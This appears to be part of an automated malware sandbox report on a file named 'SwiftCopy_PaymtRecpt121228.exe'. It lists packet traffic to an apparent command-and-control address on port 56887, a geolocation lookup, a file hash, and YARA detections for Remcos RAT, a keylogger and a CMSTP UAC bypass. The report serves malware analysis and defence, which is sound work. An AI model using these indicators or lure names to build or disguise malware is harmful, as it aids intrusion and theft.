                                                  Dec 17, 2024 16:40:30.975801945 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975828886 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975862026 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975913048 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975940943 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976085901 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976113081 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976188898 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976329088 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976356983 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976386070 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.466850042 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:31.587110043 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.797420979 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.843327045 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:31.844620943 CET4998756887192.168.2.5192.210.150.17
Dec 17, 2024 16:40:31.964071989 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.964118004 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.964124918 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.964708090 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.964864016 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.965399981 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.965545893 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.965573072 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.965600967 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.965717077 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.965744019 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.965816975 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.965928078 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.965955973 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.966047049 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.966074944 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.966108084 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.966123104 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.966146946 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.966159105 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.966223955 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:31.966236115 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:32.471637011 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:32.591406107 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:32.801538944 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:32.846374035 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:32.881601095 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:32.882971048 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:33.001528978 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.001594067 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.001646996 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.001676083 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.001729965 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.001758099 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.001863003 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.001890898 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002019882 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002063990 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002146006 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002173901 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002223015 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002249956 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002554893 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002641916 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002692938 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002722025 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002819061 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002846956 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.002880096 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.003005981 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.487481117 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:33.607301950 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.817738056 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.861979961 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:33.871093035 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:33.879163027 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:33.991542101 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991585016 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991614103 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991684914 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991715908 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991744041 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991770983 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991797924 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991826057 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991852999 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991879940 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991911888 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991939068 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.991966009 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.998931885 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.998960018 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.999011993 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.999038935 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.999090910 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.999118090 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.999149084 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.999291897 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:33.999344110 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:34.503012896 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:34.673235893 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:34.885915995 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:34.926609039 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:34.927856922 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:35.046247005 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046263933 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046279907 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046344995 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046380997 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046442032 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046478033 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046566010 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046670914 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046736956 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046780109 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046792030 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046863079 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.046880960 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.047347069 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.047373056 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.047517061 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.047529936 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.047544003 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.047602892 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.047643900 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.048134089 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.518788099 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:35.638653040 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.850617886 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:35.893233061 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:35.893913031 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:35.896212101 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:36.014189959 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014205933 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014409065 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014420033 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014437914 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014446974 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014674902 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014724970 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014817953 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014837980 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014980078 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.014988899 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.015125036 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.015134096 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.016304016 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.016314030 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.016447067 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.016489029 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.016592979 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.016602039 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.016712904 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.016822100 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.534182072 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:36.653970003 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.863908052 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:36.908900976 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:36.910228014 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:36.911545038 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:37.029874086 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.029886961 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030044079 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030103922 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030144930 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030188084 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030266047 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030287027 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030421972 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030441999 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030556917 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030575991 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030658007 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.030678034 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.031110048 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.031269073 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.031562090 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.549710035 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:37.669373035 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.880279064 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:37.920690060 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:37.921958923 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:38.040755033 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.040782928 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.040860891 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041006088 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041014910 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041086912 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041162968 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041172981 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041181087 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041305065 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041313887 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041409969 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041430950 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041440964 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.041979074 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.042160034 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.042273998 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.042304993 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.042399883 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.344942093 CET  56887  49706  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.354083061 CET  49706  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:38.474859953 CET  56887  49706  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:38.565336943 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:38.971414089 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:38.995392084 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.091650009 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.209445000 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.251030922 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:39.252337933 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:39.371968985 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.372009039 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.372118950 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.372225046 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.372320890 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.372375011 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.372621059 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.372648954 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373034954 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373063087 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373090029 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373116970 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373226881 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373255014 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373368979 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373397112 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373483896 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373605013 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.373637915 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.581152916 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:39.702327967 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:39.965882063 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.018270016 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:40.065359116 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.065639019 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:40.065897942 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.066255093 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:40.100613117 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:40.101727962 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:40.101965904 CET  49987  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:40.220360994 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220407009 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220439911 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220449924 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220468998 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220540047 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220549107 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220563889 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220576048 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220788002 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220819950 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220892906 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.220905066 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221077919 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221324921 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221391916 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221401930 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221457958 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221467972 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221658945 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221730947 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221797943 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.221807957 CET  56887  49987  192.210.150.17  192.168.2.5
Dec 17, 2024 16:40:40.597322941 CET  49986  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:40:40.718175888 CET  56887  49986  192.210.150.17  192.168.2.5
Dec 17, 2024 16:41:08.477408886 CET  56887  49706  192.210.150.17  192.168.2.5
Dec 17, 2024 16:41:08.478424072 CET  49706  56887  192.168.2.5  192.210.150.17
Dec 17, 2024 16:41:08.598305941 CET  56887  49706  192.210.150.17  192.168.2.5
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Dec 17, 2024 16:37:05.777872086 CET  50825  53  192.168.2.5  1.1.1.1
Dec 17, 2024 16:37:05.917876959 CET  53  50825  1.1.1.1  192.168.2.5
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Dec 17, 2024 16:37:05.777872086 CET  192.168.2.5  1.1.1.1  0x9a7a  Standard query (0)  geoplugin.net  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Dec 17, 2024 16:37:05.917876959 CET  1.1.1.1  192.168.2.5  0x9a7a  No error (0)  geoplugin.net  -  178.237.33.50  A (IP address)  IN (0x0001)  false
                                                  • geoplugin.net
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.5  49708  178.237.33.50  80  7664  C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
Timestamp  Bytes transferred  Direction  Data
Dec 17, 2024 16:37:06.047321081 CET  71  OUT  GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 17, 2024 16:37:07.329452038 CET  1171  IN  HTTP/1.1 200 OK
                                                  date: Tue, 17 Dec 2024 15:37:07 GMT
                                                  server: Apache
                                                  content-length: 963
                                                  content-type: application/json; charset=utf-8
                                                  cache-control: public, max-age=300
                                                  access-control-allow-origin: *
                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                  Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

                                                  Target ID:0
                                                  Start time:10:36:59
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"
                                                  Imagebase:0x1c0000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
